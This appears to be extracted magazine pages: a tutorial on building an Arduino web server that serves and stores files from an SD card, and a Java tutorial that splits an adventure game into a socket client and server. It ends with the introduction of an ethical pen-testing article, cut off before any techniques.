You could be boiling a kettle, opening the garage door, or
even controlling motors on some kind of robot you built
yourself, all feeding back to the user on their browser. An
Arduino server can become the gateway into your world.
Set up the hardware
You’ll need an Arduino board, a way of connecting
it to your internet router and SD card reading capability.
For this tutorial, we used the Arduino Leonardo and
the Ethernet & SD card shield. Immediately, you’ll need
to insert the shield into the Arduino’s header pins and
connect your shield to the router with an Ethernet cable.
You’ll also need to power your Arduino – but for now, plug
it into your computer with a USB cable.
You should log into your router, identify your device’s
local IP address and check that you have configured
your router correctly. If you don’t have access to the
administrator login, you might be able to determine
its network address using nmap or arp -a. At the top
of the example ‘WebServer’ sketch (under Ethernet
Library sketches), you’ll need to change your IP and MAC
addresses to match.
Upload this sketch, as is, to your Arduino. If all is well,
you should be able to connect to your device from any
browser and it should display a sensor reading. As you
haven’t connected anything to the input pin, it’s probably
going to be zero or just garbage, but that’s okay, we’re
going to get rid of it anyway.
Read HTTP requests
Open the serial monitor within the Arduino IDE
and connect to your device on your browser. A stream
of text should appear. This is the HTTP request that the
browser is sending to the Arduino. At the beginning is
the request method in all caps, followed by the resource
requested. Briefly, the browser is sending a request to
ask the server to GET a resource, such as a webpage
(in this case just ‘/’). A web server should then send a
response message after determining the nature of the
request and assessing resources. For example, if a page
is not found, it should reply ‘HTTP/1.1 404 Page Not
Found’. This is a header and would be a response to a
HEAD request. This can be followed by a message, such
as the main body of a webpage.
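Before writing the Arduino code, it can help to dissect a request line by hand; here the same split-at-whitespace idea is sketched in shell (the request line below is a typical example, not captured from a real board):

```shell
# A browser request line: method, resource, protocol version.
request='GET /index.htm HTTP/1.1'

method=${request%% *}     # everything before the first space
rest=${request#* }
resource=${rest%% *}      # the second field: the requested resource

echo "method=$method resource=$resource"
# prints: method=GET resource=/index.htm
```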
What we are going to do here is emulate the server behaviour by responding appropriately to certain HTTP request types. To begin, you’ll need to write a function to read the HTTP request letter-by-letter, saving to a character array, and pausing when you receive a whitespace character. You should then convert that character array to a string and compare the received request to the methods your Arduino is going to serve. For now, we’ll deal with GET and HEAD. You’ll also want to store the resource name.

if (client.available())
String reqType = mesgbuff;
if (reqType == "GET")
else if (reqType == "HEAD")

Go global
Don’t be afraid to declare character arrays as global variables. While it’s generally not recommended, in such a constrained program it will make accessing the useful data very easy. In the example sketch, the client and the server functionality was declared this way. Similarly, it would be useful to declare the SD card file as a global variable too.

Serve HTTP requests
The GET request is just like the HEAD request, but with an additional body that follows the header information. To save on program space, the GET request should call a function that returns the header information and then finishes off with the message body. Begin by making a function which can reply with the HEAD information, as in the first four client.println() calls in the example code. Depending on the availability of resources on the SD card and the request sent, we will want to change this code by passing it in as an argument, but for now we’ll just use the ‘200 – OK’ code.
Now add another function which can process GET requests. This function should check the SD card for a file with the same path as the requested resource and return an OK code if present, or an error code if not, followed by the content of the resource (or an error page). This check can be done with SD.exists(), but to initialise the SD card you’ll need to add a line at the top of the sketch:

#include <SD.h>

To return the content, you also need to declare and open the file, read the contents (see the SD card example sketches), then print the file contents back to the client.
Create the website files
Before we can test the server, you’ll need to
create a set of HTML files for the Arduino to send to the
client. These days, using just HTML and CSS alone, it is
possible to quite quickly make a somewhat interactive,
elegant website automatically compatible with different
display sizes. Because we are dealing with GET requests
appropriately rather than just sending a single page
every time, as some people have done, we are able to
use the iframe and object tags and host our own images.
However, because you can’t install software or run
scripts on the Arduino server, some of the tricks with
PHP, JavaScript and other languages won’t necessarily
work. There are also issues with speed. Sending a 10MB
image to the client will take a while. However, creating a
forward-facing minimalist website is possible and can be
done in a few hours.
When saving your files, be sure to not use more than
three characters in the extension and eight characters
in the filename. The SD library won’t allow more, and it’s
very easy to conclude that your code is broken rather
than suspect something as simple as a filename: your
author wasted a day on this problem, so use .htm. When done,
insert the SD card into the shield and reset your Arduino.
Test and fix your server
In the main loop you should now be able to
compare the string comprising of the requested method
and the methods served by the Arduino and then call
the appropriate function. Upload this new sketch to the
board and try out your website. You should be able to
use your local IP address followed by the filename in
your browser’s address bar. The server isn’t yet
fully operational, but we’re getting there. As you navigate,
several problems should become apparent.
First of all, regardless of what happens, the ‘200 – OK’
code is returned. Second, the server is always responding
with ‘text/html’, even if the Arduino is actually sending
over JPEGs or plain text. Also, if any images are large,
you’ll already be experiencing performance issues and, if
too large, you can be denied service altogether.
To fix these problems, you’ll need to create a function
which determines if the file is on the SD card and, if so,
look at the extension and return a string for the response
code and the resource type. This should be used in the
HEAD method when called. You should also return a 404
error if there is no file, and a 405 error if the method isn’t
served by the Arduino. Images should be compressed and
data sent in batches using a buffer.

Prune your program
If you’ve fixed the above problems then pat yourself on
the back: you’ve managed to create a mini-server which
can host a basic website that, with the right router
configuration, can be accessed from the outside world.
Any cool features, like CSS animations, filters and
scripts, will need to be done client side, and any
database lookups just can’t be done. The good news is
that we at least comply with some of the HTTP protocol
and, for most viewers, this will just seem like a normal
website. Nevertheless, our functionality is still quite
restricted. Let’s suppose we want someone to be able to
leave comments, or use this to run a personal blog. We’re
going to need to add in another HTTP method: POST.
However, as those using an Arduino Uno or Leonardo
have probably noticed, we’re already running up against
the maximum program size, which is limited to 28KB.
The SPI, SD and Ethernet libraries take up a lot of the
program space, but we’ve contributed our fair share too.
It’s time to get rid of any unnecessary print statements
(although keep printing the incoming request to screen)
and clean out the code. We only need to make a little bit
of room for an extra function and an extra if condition in
the main loop.
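The extension-to-type lookup described for the header function can be sketched as follows. This is illustrative Java with names of our own choosing, not the Arduino sketch itself:

```java
// Hypothetical sketch of the header-building logic: map a filename
// extension to a MIME type and pick the right status line.
public class ResponseHeader {
    public static String typeFor(String filename) {
        if (filename.endsWith(".htm")) return "text/html";
        if (filename.endsWith(".css")) return "text/css";
        if (filename.endsWith(".jpg")) return "image/jpeg";
        if (filename.endsWith(".gif")) return "image/gif";
        return "text/plain"; // fallback for anything else
    }

    public static String statusLine(boolean fileExists, boolean methodServed) {
        if (!methodServed) return "HTTP/1.1 405 Method Not Allowed";
        if (!fileExists) return "HTTP/1.1 404 Not Found";
        return "HTTP/1.1 200 OK";
    }
}
```

On the Arduino the same decisions would be made with character-array comparisons before printing the header to the client.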
Serving POST requests
POST requests tell the server that a new
resource needs to be created. On an HTML page these
requests can be generated using the form and input tags.
These allow you to specify the method (e.g. POST) as well
as the action (designating the page to be loaded after
submission). When a user submits, the HTTP request
sends the method, the resource to load and, at the very
end after two line breaks, the message submitted. This
message is in the format ‘field=message data’.
To serve POST requests, you will want to identify the
requested method and call a new function. This function
should read the name of the resource specified by the
action in the form and save it to a spare buffer. It should
then open a file on the SD card, read from client and
save everything after the double-line break. The function
should finish by calling the GET function (which also
calls HEAD) and retrieving the stored resource name. You
may need to modify the existing code and will want the
filename to increment. If you still have program space,
you may also want to split the field name from the data in
the message body by checking for an = sign and use the
field name as the filename for the new resource created.
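The ‘field=message data’ split described above amounts to cutting the body at the first ‘=’ sign. A hedged sketch, again in Java with invented names rather than the Arduino code:

```java
// Hypothetical helper: split a POST body of the form "field=data"
// at the first '=' into the field name and the message data.
public class PostBody {
    public static String[] split(String body) {
        int eq = body.indexOf('=');
        if (eq < 0) return new String[] { "", body }; // no field name present
        return new String[] { body.substring(0, eq), body.substring(eq + 1) };
    }
}
```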
Load submitted posts
To finish the blog or comments section, you’re
going to want to load all of the information submitted
to the server and display it on the webpage. One might
instinctively think of storing the information in a database
and accessing entries as needed. The only problem is,
we can’t install software or try PHP and MySQL. Instead,
if you’ve got an Arduino with larger program storage,
you might want to make a custom method which acts
like a database query. If you’ve got an ‘ordinary’ Arduino,
everything’s going to have to be done on the client’s side.
One of your author’s many shortcomings is not learning
JavaScript, but now is exactly the time. In the example
website is a snippet of code within an HTML script-tag
which iterates between 0 and 4 and creates a series
of object-tags. These object tags point to text files
containing submitted posts. These are inserted into a
paragraph in the HTML body. When the page is loaded,
the browser requests five objects separately to the .htm
file. It’s a cheap trick, and causes other layout problems,
but the server can cope and the page loads. It would be
better to load the content and layout appropriately – it
might even be better to have most recent first. If you
know how, do it.
Share with the world
The web server is finished. You can send and
receive webpages, text, images, GIFs even. It should even
run reasonably quickly. With a static IP or DynamicDNS,
you could buy a domain and let people connect to your
website without handing out a series of numbers.
However, there is still the issue of sending and
receiving obscenely large images. This will always be slow
– and is even the case with some popular websites. For
now, we can ensure that we only host small images, but if
we really need to we could always link to the resource on
a faster cloud storage service instead.
Sadly, there’s no way of stopping someone attacking
our server by uploading a 32GB file – that’s just not been
programmed in. If there’s room for it in the program, you
could count the number of characters received and check
it doesn’t exceed a limit. If that limit is exceeded, stop
saving and return a bad request code. If there’s no space,
you could do a client-side check in JavaScript.
But there are a hundred-and-one ways someone could
deny all service to the Arduino server. We’ve also added
no security for data stored on the device. However, at
least there’s no way of someone deleting information or
using the Arduino to connect to other local devices.
Help is
at hand
There is a lot of
coding in this tutorial
and not many
examples – there’s
just too much to
print. On the cover
disc is a series of
website files, as well
as the sketch used to
test the server. This
should help explain
how to perform the
tasks described
in the Arduino
language. However,
we recommend
that you write your
own sketch.
Add hardware methods
That was Arduino truly out of its comfort zone!
Now the web server is complete, let’s bring the device
back to what it’s good at: interfacing with hardware. We
can use the web server to act as the infrastructure for
controlling the Arduino remotely. To do this you’ll need
to create a new request comparison condition within
the loop function, as with the other HTTP requests.
To control the device, you can just send this arbitrary
keyword and any further instructions over Telnet (or
equivalent) to the server address to trigger an action
for the Arduino to perform. You could even create a very
simple smartphone app that sends a preset command at
the touch of a button.
And what to do with it? At this point the task could
be anything at all, from turning on a light to watering
some flowers. Depending on the size of the web server
program, it might be useful to use this Arduino as a base
station which then relays the command via radio to
other Arduinos scattered around the house. The bigger
the project, the more likely you are going to need to
upgrade to the larger Arduino. Alternatively, you could
piggyback off of the POST method and put the world in
charge of your hardware using a simple HTML form as
a controller.
Learn Java: Broadcasting your
Java game over a network
is a university tutor
in Programming
and Computer
Science, with a
strong focus on
Java. He likes to
install Linux on
every device he can
get his hands on.
Java has a fully featured networking library that allows
programs to communicate across different computers
OpenJDK 1.8 JDK
JavaFX 8
Eclipse IDE
Telnet client
Tutorial files
When we think of computer networks, we think of the
world wide web, which we can use for sending emails,
watching videos or talking to people over video. In
fact, all of these are examples of a very simple concept:
computers connecting to other computers on a device
called a ‘socket’ and using the socket to send text back
and forth. The text might be in HTML format, it might be
the text representation of an image, and it might even be
encrypted, but the same mechanism is used in all cases.
The Java language has a rich networking library that
allows us to harness this power for our own programs.
At the end of last month’s tutorial, we had a simple
adventure game to play on a single computer. Here
we’ll be making this into a networked game, where the
underlying logic and game model sit on one computer,
and the graphical client used to play the game can be put
on another. We’ll be able to build on this in future tutorials
to make a multiplayer online version of our game.
Getting started
We shall not require any special new software for this
tutorial, but if you are joining us this month then you
should make sure to install OpenJFX on your system.
Look for a package called openjfx. Once you have
installed it, make sure to restart Eclipse if it is already
open. If you have completed the tutorial from last month,
open the project in Eclipse. Otherwise, open up the
implementation of last month’s tutorial that is supplied
on the cover disc. To do this, open up Eclipse, and select
File > Import… from the menu at the top. From the dialog
that comes up, we select General > Existing Projects into
Workspace, and then click ‘Select archive file’, followed
by ‘Browse…’ and navigate to the file eggs.tar on the
LU&D disc. Last, we press ‘Finish’ to import the project.
We have not supplied any additional code for this issue:
you will be extending last month’s code directly.
Networking concepts
The plan for this month’s tutorial is shown in the diagram
at the top of this page. We will be splitting the program
we have into two separate programs: a ‘client’ and a
‘server’. These will communicate with each other through
a device called a ‘socket’, which is a channel that allows
text to flow through a network from program to program.
Thanks to the way we have set up our program, we should
be able to do this without disrupting our existing code too
much: instead of communicating with the game model
directly, our GUI will now communicate with the socket at
its end, while the game model will use the socket for its
input and output.
A computer on a network is identified by a number
called its IP address. The computer also has 65,536
‘ports’, also identified by numbers, which can be used
to broadcast and receive information. We often refer to
a port on a particular machine by separating the IP
address and port number with a colon.
If a program is broadcasting to a particular port on a
machine, we refer to it as a ‘server’. To give the server
work to do, we need a second program, called a ‘client’,
which will communicate with the server. The client can
run either on the same computer as the server or on a
different computer. As long as the client knows the IP
address and port that the server is serving to, it can try
to form a connection known as a ‘socket’. If the server
accepts the connection, then the socket is brought into
existence and client and server can exchange textual
information. There can be more than one socket set up on
the same port, perhaps involving multiple clients.
This is the general principle underpinning much of
computer networking. When we open a website in our
browser, we are in fact setting up a socket with the port
on which the website is being served. The web server
is set up to broadcast information in the text formats
HTML, CSS and JavaScript, and our web browser is set up
to interpret these text formats as a webpage.
Java has a big networking library – in the java.net
package – that makes it easy to do all this in our
programs. In our server program, if we want to set up a
server on port 9009, we can do so using the code:
ServerSocket serverSocket = new ServerSocket(9009);
Meanwhile, the client program needs a way to connect to
the port. It does so by creating a server object:
Socket serverConnection = new
Socket("", 9009);
Left Eclipse makes
it easy to import
a project from an
archive file
The call ServerSocket.accept() blocks (waits) until
some other program attempts to connect to the port at
9009. When it does so, the socket is created and both
client and server can use it to send text back and forth.
Note that if a client tries to create a new socket
and there is no server program broadcasting on that
particular port at that particular IP address, then Java
will throw an exception. Our code will need to handle this
exception appropriately.
The last thing we need to learn how to do is how to
actually send text across a socket. We do this using
‘streams’. If you have written Java code to read and
write text to and from the console using System.in and
System.out, you already know how to use streams. Using
a socket for input and output is the same as using the
console, except we replace System.out with the socket’s
‘output stream’ and replace System.in with the socket’s
‘input stream’. Meanwhile, to read text in from a socket,
we can use a BufferedReader, just as we did in the
text-only game. See Figure 1 (overleaf) for an example.
The call BufferedReader.readLine() throws an
IOException, so we’ll need to write code to handle that.
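Putting the calls from this section together, here is a minimal loopback example that assumes nothing about the game code: a one-shot server on an OS-chosen port, a client connection, and one line of text each way.

```java
import java.io.*;
import java.net.*;

public class LoopbackDemo {
    // Send one line to a throwaway echo server and return its reply.
    public static String roundTrip(String message) throws Exception {
        ServerSocket serverSocket = new ServerSocket(0); // port 0 = any free port
        Thread server = new Thread(() -> {
            // accept() blocks until the client below connects
            try (Socket client = serverSocket.accept()) {
                BufferedReader in = new BufferedReader(
                        new InputStreamReader(client.getInputStream()));
                PrintWriter out = new PrintWriter(client.getOutputStream());
                out.println("echo: " + in.readLine());
                out.flush(); // socket streams buffer their output
            } catch (IOException e) {
                throw new UncheckedIOException(e);
            }
        });
        server.start();
        try (Socket socket = new Socket("localhost", serverSocket.getLocalPort())) {
            PrintWriter out = new PrintWriter(socket.getOutputStream());
            out.println(message);
            out.flush();
            BufferedReader in = new BufferedReader(
                    new InputStreamReader(socket.getInputStream()));
            return in.readLine();
        } finally {
            server.join();
            serverSocket.close();
        }
    }
}
```

Note the flush() after each println(): without it the buffered text may never leave the socket.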
Left Once we are
running our server in
Eclipse, we can use a
Telnet client to check
that it works
Note that the empty address string is just a placeholder;
we will need to use a real address. The server can accept new
connections using the code:
Socket clientConnection = serverSocket.accept();
Figure 1
PrintWriter out = new PrintWriter(socket.getOutputStream());
out.print("Hello, ");
InputStream in = socket.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(in));
Above Input and output streams for sockets provide
the same methods we’re used to from System.in and
System.out
Set up the server
We’ll start by creating the server program. First of all, we
create a new package to hold the server code.
Our server design should follow the pattern given in
the diagram on page 46. That is to say, it should behave
exactly like the existing standalone program, but it
should replace the input and output components with
server-specific components.
First, create a new class called ServerHead. This
class should implement the OutputViewer interface, so
that we can plug it straight into the existing GameModel
class. Create a private field called serverOut of
type PrintWriter in this class. This field will be the
PrintWriter instance that we can use to print text to
the socket. You could set the value of this field in the
constructor. For example:
public ServerHead(Socket clientSocket) throws IOException {
    serverOut = new PrintWriter(clientSocket.getOutputStream());
}
Changing the old code
Across The humanreadable output for the
inventory command is
not suitable for sending
across a socket. A
compact code is better
Throughout this tutorial, you shouldn’t be afraid to go into the
old classes and modify or repurpose them to suit your new
program, as long as you patch things up so the old programs
still work. For example, if you play through the game in the
attached code, you’ll see that the positions of animals in the
inventory change around as we play through. This is because
the program uses the Set data type to store the animals
in, and Sets are unordered by definition, so Java makes no
guarantee that the animals will stay in the same order.
To fix this, go into the Player interface and modify the
getCarriedEggs() and getCarriedAnimals() methods.
We could replace Set with List, but it’s better to be more
general and use Collection. That way, the implementation
can use Set, List, Queue or anything else to implement the
interface. Right-click on the getCarriedAnimals() method,
go to ‘Refactor’ and select ‘Change method signature’,
replacing Set with Collection. You’ll still need to go into
the HumanPlayer implementation to modify the signatures
of the implementing methods and to change the types of the
field carriedAnimals to Collection.
You can then choose the particular type of collection you
want inside the constructor to HumanPlayer. If you change
HashSet into ArrayList, then the animals will stay in order.
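The ordering difference is easy to demonstrate in isolation. This standalone sketch (names invented here, not from the game code) declares the collection as Collection and lets the concrete class decide iteration order:

```java
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;

public class OrderDemo {
    // With Collection as the declared type, the backing class decides
    // iteration order: ArrayList preserves insertion order, HashSet may not.
    public static List<String> carriedInOrder(String... animals) {
        Collection<String> carried = new ArrayList<>(); // swap in HashSet to lose ordering
        for (String animal : animals) {
            carried.add(animal);
        }
        return new ArrayList<>(carried);
    }
}
```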
This way, we can create a new instance of the ServerHead
class and pass it a socket to print to in one command.
As an alternative, we could make the ServerHead class
extend the PrintWriter class. Then we can do away with
the field and change the constructor to:
public ServerHead(Socket clientSocket) throws IOException {
    super(clientSocket.getOutputStream());
}
It is tempting at this point to repurpose the original
ConsoleOutputViewer class, making a few modifications
so that it can print to an arbitrary PrintWriter instance.
You can try this if you like, but there’s a good reason not
to: the output generated by the ConsoleOutputViewer
is not necessarily very easy for the GUI to interpret.
If you are using the supplied code from the first
tutorial, for example, then the ConsoleOutputViewer.
displayInventory() method displays the player’s
inventory in the long form shown in Figure 2. While it may
be possible for the client code to parse this and convert
it into a format the GUI can use to populate its inventory
pane, it is better to print the inventory to the server in a
more compact form, as shown at the bottom of Figure 2.
Similarly, the output from the search command in
ConsoleOutputViewer displays the player symbol in
the middle of the map. But the client does not need this
information; it would be more useful for it to know the tile
that the player is standing on.
In order to implement all the OutputViewer methods
in the ServerHead class, we’ll need to invent some kind
of protocol language that the server can use to convey
the required information about the map, inventory or
messages to the client program. We’ll leave this up to
you: if you’re unsure then you can use the form that we’ve
described above for the displayInventory command
and the usual display for the search command, but
without putting the player symbol in the middle.
There are a couple more things that we should add
to the ServerHead class before we move on. First, the
client needs to have some way of knowing what kind of
command is coming in – whether it’s a message, a map
grid or an inventory code. For that reason, it’s a good idea
to print one of message, map or inventory to the socket
first, before printing the appropriate code.
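One possible framing, then, prints the tag, the payload lines and an end marker. The protocol itself is yours to design; the names below are just one choice, shown writing to a string buffer rather than a real socket:

```java
import java.io.PrintWriter;
import java.io.StringWriter;

public class Protocol {
    // Hypothetical framing: a tag line ("message", "map" or "inventory"),
    // the payload lines, then "end" so the client knows where to stop.
    public static String frame(String tag, String... lines) {
        StringWriter buffer = new StringWriter();
        PrintWriter out = new PrintWriter(buffer);
        out.println(tag);
        for (String line : lines) {
            out.println(line);
        }
        out.println("end");
        out.flush(); // would matter on a real socket stream
        return buffer.toString();
    }
}
```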
Figure 2
Carrying 1 mystery eggs.
Carrying 3 animal(s).
Chicken says Cluck
Chicken says Cluck
Duck says Quack
Figure 3
reader = new BufferedReader(new InputStreamReader(in));
Changing the constructor of the class will break the
luad.eggs.App class (i.e., the main class for the text
version of the game), so we’d better fix it. Change the line:
ConsoleInputController controller = new
Above When we send the map tiles across the socket, it is better
not to put the player symbol in the middle
Second, the BufferedReader.readLine() method
reads input from the socket a line at a time. So if we
print a map grid to the socket, as in Figure 3, then the
client will read this as eight separate lines of input.
We need some way to tell the client when the message
has finished, so it’s a good idea to send end to the socket
after printing the message. Last, we need to ‘flush’ the
PrintWriter. Socket streams, unlike System.out, buffer
their output for performance reasons, because it is faster
to send a large chunk of text across a socket than to send
many individual lines. Calling the PrintWriter.flush()
method makes sure that the buffer is cleared and our
entire message is sent across to the client.
We could bundle this up into a helper method, e.g.:

private void endMessage() {
    serverOut.println("end");
    serverOut.flush();
}
The next thing to do is to set up the server so it can
read input from the socket. This time, since player
commands are always single lines of text, it makes
sense to repurpose the ConsoleInputController class
in the luad.eggs package so that it can read input from
streams other than System.in. Rename the class to
StreamInputController and add a field called reader
of type BufferedReader (if you are using the supplied
code then this field already exists). Add code to the
constructor to set the value of this field:
public StreamInputController(InputStream in) {
    reader = new BufferedReader(new InputStreamReader(in));
}
The last step is to create the main class for the server.
Create a class in the server package called
EggsServer with a main() method in it. We model this
main method on the main method in the luad.eggs.App
class. The only differences are:
• We use a ServerHead instead of a ConsoleOutputViewer.
• We use a StreamInputController initialised with the
input stream of a socket instead of System.in.
In order to implement this, we need to add code to set up
the socket. For now, choose a port number (e.g., 9009)
and write code to create a ServerSocket on that port,
as we explained how to do in the previous section. Then,
add a line of code that calls the accept() method on that
ServerSocket instance and returns a Socket instance.
We can now use this instance of Socket to initialise our
ServerHead and StreamInputController objects.
Once we’ve set up the socket, we can pretty much copy
over the code we used in the main method of the luad.
eggs.App class, replacing the ConsoleOutputViewer
with a ServerHead and using the socket to initialise the
StreamInputController. Once again, polymorphism has
allowed us to switch different implementations of the
same functionality in and out for one another.
Test the server
with Telnet
Once you have
created the server,
you will want to
test it out to check
it works before
you move on to
the client. A great
way to do this
is with a Telnet
client – a very basic
client that sends
whatever you type
to a socket and
prints out whatever
comes back. If your
server is running on
port 9009, you can
use the command
telnet localhost
9009 to start the
Telnet client. Then
try typing some
commands, such
as move E, search
and inventory to
check that your
server is working.
Set up the client
Creating the client will take a bit more work than creating
the server. On the surface, however, we are doing the
same thing: we are connecting our GUI input and output
classes directly to a socket, rather than connecting them
to the game model.
To warm up, create a new package for the client code
and add a class to it
called MessagePrinter. This class will replace the
StandardGameModel class in our client. It will be
responsible for listening out for input commands
from the GUI and sending them through to the socket,
and then to the server. This class should have a field
out of type PrintWriter, whose value it sets from
the constructor:
public MessagePrinter(OutputStream outputStream)
Reuse your code
Make sure that
you’re always on
the lookout for
ways in which you
can reuse your old
code. For example,
if you have written
code to read the
game map in from
a file (or if you are
using the supplied
code) then you can
repurpose that code
and use it in the
Translator class.
You might have
to rewrite the
original TextMap
class in order to
abstract out certain
pieces of code as
methods that can be
used elsewhere.
Across The client
doesn’t need to know
what animal the egg
contains in order
to display it, so it is
sufficient to create a
‘dummy’ egg
out = new PrintWriter(outputStream);
Alternatively, the MessagePrinter class could extend the
PrintWriter class and call the superclass constructor in
its constructor.
The MessagePrinter class should also implement the
Observer class, as the StandardGameModel class does.
This means that it needs to implement the update()
method to respond to messages from the object(s) it is
observing. In our case, we will be adding this class as an
observer to the EggsListener class, so it will be receiving
messages of the form search, move N and so on, and it
should pass these messages directly on to the socket
when it receives them. So, for example, the update()
method could contain code that looks like the following:
out.println(message);
out.flush();

…where message is the second parameter to the
update() method.
The next class we shall create will be called
ServerListener. This class should extend the
Observable class. Its role is to listen to the socket for
messages from the server, bundle them up into individual
commands and send them out to the rest of the client
program. Since we want this code to run in its own
thread, ServerListener should also implement the
Runnable interface, as the StreamInputController
class does. The ServerListener class should have
a field socket, of type Socket, which it should set in
the constructor and use to create a BufferedReader
instance called fromServer, from which it can read lines
of text from the server.
The code in this class will go in the run() method,
which is the code that will run when we start the server
listener in its thread. Write this method so that it
contains a loop that repeatedly reads lines of text from
the server:

public void run() {
    String serverMessage;
    while ((serverMessage = fromServer.readLine()) != null) {
        // do something
    }
}

Right The client
is responsible for
converting this grid of
characters into a grid of
tiles on the GUI

Figure 4

switch (messages.get(i).charAt(j)) {
case '.':
    mapTiles[i][j] = new LandTile();
    break;
// ...
case 'E':
    mapTiles[i][j] = new LandTile();
    // add a dummy egg to the tile: ... new SimpleEgg(null, 0));
    break;
// ...
}
This loop should be responsible for bundling up the
server input into Collections (e.g., ArrayLists or
LinkedLists) of strings, and then passing these
collections of strings to the notifyObservers() method
so that the observing classes can deal with them. In other
words, the ServerListener class should repeatedly read
messages from the server, adding them to a collection as
it goes, until it reads an "end" message, at which point it
should call setChanged() and notifyObservers() with
the collection of strings so that some other part of the
program can deal with the messages.
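The reading loop can be sketched independently of the GUI. Assuming the ‘end’ marker convention from the server section (class and method names are ours), a bundle is just every line up to that marker:

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

public class MessageBundler {
    // Collect lines from the server until "end" (or end of stream);
    // the caller would pass the result to notifyObservers().
    public static List<String> nextBundle(BufferedReader fromServer)
            throws IOException {
        List<String> bundle = new ArrayList<>();
        String line;
        while ((line = fromServer.readLine()) != null && !line.equals("end")) {
            bundle.add(line);
        }
        return bundle;
    }
}
```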
The last component of the client that we need to
write before we put it together is the class that actually
interprets the chunks of strings from the ServerListener
class. Create a class in the client package and call it
ServerOutputTranslator. Since this
class is dealing with information from the observable
ServerListener class, it should implement the
Observer interface, and its update() method should be
responsible for dealing with the blocks of strings supplied
by ServerListener.
Add a field to the ServerOutputTranslator class
called viewer of type OutputViewer. As before, write the
constructor so that it takes in an OutputViewer object
as a parameter and uses it to set this field. The update()
method should read its second parameter (which will be
the collection of strings sent by ServerListener), cast
it to a collection of strings and then use these strings to
call methods of the viewer field.
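Because update() receives its argument as a plain Object, the translator has to cast before it can read the strings. A minimal sketch of that checked cast (the method name is invented for illustration):

```java
import java.util.Collection;
import java.util.Iterator;

public class UpdateCast {
    // Recover the first string (the tag) from the Object passed to update().
    @SuppressWarnings("unchecked")
    public static String firstTag(Object arg) {
        if (!(arg instanceof Collection)) {
            return ""; // not a bundle of strings; ignore it
        }
        Collection<String> messages = (Collection<String>) arg;
        Iterator<String> it = messages.iterator();
        return it.hasNext() ? it.next() : "";
    }
}
```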
First, we should write a switch statement that looks at
the first string in the collection and determines whether
we are dealing with a single message, an inventory code
or a map grid display. We then need to write code to deal
with the message we’ve received. There are a few things
to be careful of here. Notice that the displayMapTiles()
method takes in an array of MapTile objects as a
parameter. Instead, we have an array of characters
like the one in Figure 3, which we need to convert into
MapTile objects. This is easy enough for land and sea
tiles, as Figure 4 shows. But what if the tile character
Figure 5

public void displayMapTiles(MapTile[][] grid) {
    Platform.runLater(() -> {
        MapView mapArea = gui.getMapArea();
        mapArea.displayMapGrid(grid, -3, -3);
    });
}
that comes through is marked 'E'? That means we should
create a LandTile instance and add an egg to it.
We do not know what animal should go inside the egg.
But this is actually a design feature: if the server sent
information about the contents of the eggs to a port, then
someone could write a malicious client that allowed them
to cheat and look inside the eggs without picking them
up. For the purposes of this client, it is better to create a
‘dummy’ egg with nothing inside it, as in Figure 4.
Similarly, since OutputViewer.displayInventory()
takes a Player object as a parameter, we will need to
create a ‘dummy’ player from the inventory code that the
server supplies us with.
Putting the client together
The final step is to create a class, EggsClient, that acts
as an entry point to the client program. Since the client
involves JavaFX code, this should be based upon the
luad.eggs.gui.App class. The changes we need to make
are similar to the changes we had to make to the server.
First, we create a socket using the code:
Socket socket = new Socket("localhost", 9009);
…replacing 9009 with the port number your server is
using. localhost is a special address that refers to your
local machine; to run our client and server on separate
machines, we’d need to find out the server computer’s IP
address and use that in place of localhost.
Across The method makes sure that our JavaFX code is run on the FX application thread. Note our use of Java 8 lambda expressions to make the code more compact

Object streams
Using the ObjectInputStream and ObjectOutputStream classes, we can send objects across a socket, rather than text. You can set up an object stream over a socket easily:

ObjectInput in = new ObjectInputStream(socket.getInputStream());
ObjectOutput out = new ObjectOutputStream(socket.getOutputStream());
We can write objects to the stream with the writeObject()
and flush() methods and read with readObject(). These
classes work by converting the object into a stream of bytes using a process called 'serialization' and then converting back to objects at the other end. If you use these classes for
this project, it will prevent you from having to write separate
methods to translate from map tiles / inventories to text
and back again. There are a few downsides, however. First,
Java serialization is not understood by other programming
languages, so your server will only work with a client written
in Java, or in another language with a special Java serializing
parser attached. Second, if your server broadcasts the full
objects across the stream, then it’s including information
which the client shouldn’t necessarily have access to. For
example, if the server sends across the full grid of MapTile
objects, it is including info about the animals inside each egg
on the map. A malicious client could then use this information
to cheat by looking inside the eggs without picking them up.
Use this socket to create instances of the
MessagePrinter and ServerListener classes. Create
the GUI as before and use it to create GuiOutputViewer
and EggsListener objects. You can use the
GuiOutputViewer object to set up an instance of ServerOutputTranslator.
Now we need to add observers to the right objects.
The ServerOutputTranslator object should be listening
to the ServerListener class, as we discussed, and the
MessagePrinter object should be added as an observer
to the EggsListener object. The last step is to start the
ServerListener thread:
new Thread(serverListener).start();
Now it’s time to test our program. First run the server
class EggsServer from Eclipse, then run the EggsClient
class. If everything works as it did at the start, then you
have done a very good job. More likely, you will need to
spend some time debugging your code to get it right.
Thread warning
If you follow these steps, you might end up with an error
that looks like this:
java.lang.IllegalStateException: Not on FX application thread

This is because JavaFX code all needs to run on a special thread called the FX application thread. To fix this, go into the luad.eggs.gui.GuiOutputViewer class and wrap the interface methods in there inside Platform.runLater() calls, as in Figure 5.

Above In order to try out the program, run the server first, and then run the client. You can do both in one Eclipse session
Top pen-testing techniques
Having nightmares every night about terrible data breaches on your systems?
Fret not: Toni Castillo Girona demonstrates how to identify those weak spots
and regain control of your dreams so you can sleep soundly!
Ethical hacking
This guide is for use on networks
and systems that you own.
You have been warned!
The media is full of news concerning data
breaches exposing countless usernames and
hashed passwords day in and day out. Most of
them are due to weak spots on the compromised
systems, such as well-known vulnerabilities or buggy
in-house developments. To some, black hats are
tech-savvy people performing magic tricks. They are
indeed tech-savvy people, but they do not perform
magic at all. Most data breaches can be explained by
means of well-known vulnerabilities, SQL-injection
issues and old systems that haven't been patched.
To identify these weak spots, professional
penetration testers perform an assortment of tests
whose techniques are not far from the ones used by
black hats. The main difference, of course, is that
they have been hired to find (and sometimes exploit)
these weak spots. Black-box pen-testing is similar to
what an external attacker would try (as the pen-tester
does not know anything about the target prior to the
engagement). A pen-tester works with what is already
known. That means that they do not (usually) look for
zero-days or deal with reverse engineering.
A pen-test is composed of seven different stages.
The pre-engagement stage happens before the test
actually begins; here the pen-tester and the company
